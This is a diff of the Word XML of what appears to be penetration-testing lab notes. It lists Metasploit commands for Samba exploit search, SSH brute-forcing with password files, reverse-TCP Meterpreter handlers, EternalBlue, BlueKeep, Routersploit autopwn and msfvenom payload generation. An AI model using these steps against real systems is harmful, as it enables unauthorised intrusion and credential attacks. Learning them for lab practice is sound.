+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>SMB</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchs samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FIND THE VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>info</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show options</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>GET VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>REPEAT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: user {PATHNAME}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>BRUTEFORCE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> attack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: search SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show info</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set </w:t>
+            </w:r>
+            <w:r>
+              <w:t>PASS_FILE</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {filepath}</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {version}</w:t>
+            <w:r>
+              <w:t>USER_FILE</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3564,628 +3219,93 @@
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
             <w:r>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ear</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ch {</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> version </w:t>
-            </w:r>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use exploit/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>unix</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: show </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>payploads</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> or show options</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: set target {number}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: exploit</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+              <w:t>SET RHOST</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve"> CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>CL: s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>essions</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sessions</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FROM DESKTOP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Use exploit/multi/handler</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>Netcat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -help</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Telnet</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Linux </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>tetnetd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: search Linux </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>telnetd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>CL: telnet {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>SMB</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchs</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FIND THE VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb_version</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/{VERSION}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: show </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>info</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> or show options</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> or show payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: run</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>GET VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>REPEAT</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> Samba 3.0.20</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: user {PATHNAME}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: show payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>BRUTEFORCE</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> attack</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: search SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh_login</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show info</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: set </w:t>
-            </w:r>
-            <w:r>
-              <w:t>PASS_FILE</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>filepath</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>USER_FILE</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>SET RHOST</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve"> CL: run</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>CL: s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>essions</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>sessions</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FROM DESKTOP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfadmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>@{IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>Use exploit/multi/handler</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>CL: set payload windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4258,13 +3378,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: search </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>eternalblue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: search eternalblue</w:t>
+            </w:r>
           </w:p>
           <w:p/>
         </w:tc>
@@ -4285,14 +3400,12 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>DoublePulsar</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -4313,36 +3426,13 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>su</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dpkg</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            <w:r>
+              <w:t>Sudo su</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4367,19 +3457,11 @@
                 <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>BlueKeep</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -RDP Vulnerability</w:t>
+              <w:t>BlueKeep -RDP Vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4408,14 +3490,12 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Routersploit</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4446,13 +3526,8 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Follow the instructions in </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>github</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Follow the instructions in github</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -4579,21 +3654,8 @@
                 <w:szCs w:val="20"/>
                 <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
               </w:rPr>
-              <w:t xml:space="preserve">cd </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-              </w:rPr>
-              <w:t>routersploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>cd routersploit</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -4694,13 +3756,8 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use scanners/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>autopwn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: use scanners/autopwn</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -4821,18 +3878,8 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Note: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Note: msfvenom</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4866,15 +3913,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -h</w:t>
+              <w:t>CL: msfvenom -h</w:t>
             </w:r>
             <w:r>
               <w:t>elp or -h</w:t>
@@ -4882,13 +3921,8 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>CL:msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -p</w:t>
+            <w:r>
+              <w:t>CL:msfvenom -p</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4900,28 +3934,12 @@
               <w:t>:</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –list venom</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –list payload</w:t>
+              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: msfvenom –list payload</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4965,25 +3983,7 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Veil – generating </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>powershell</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
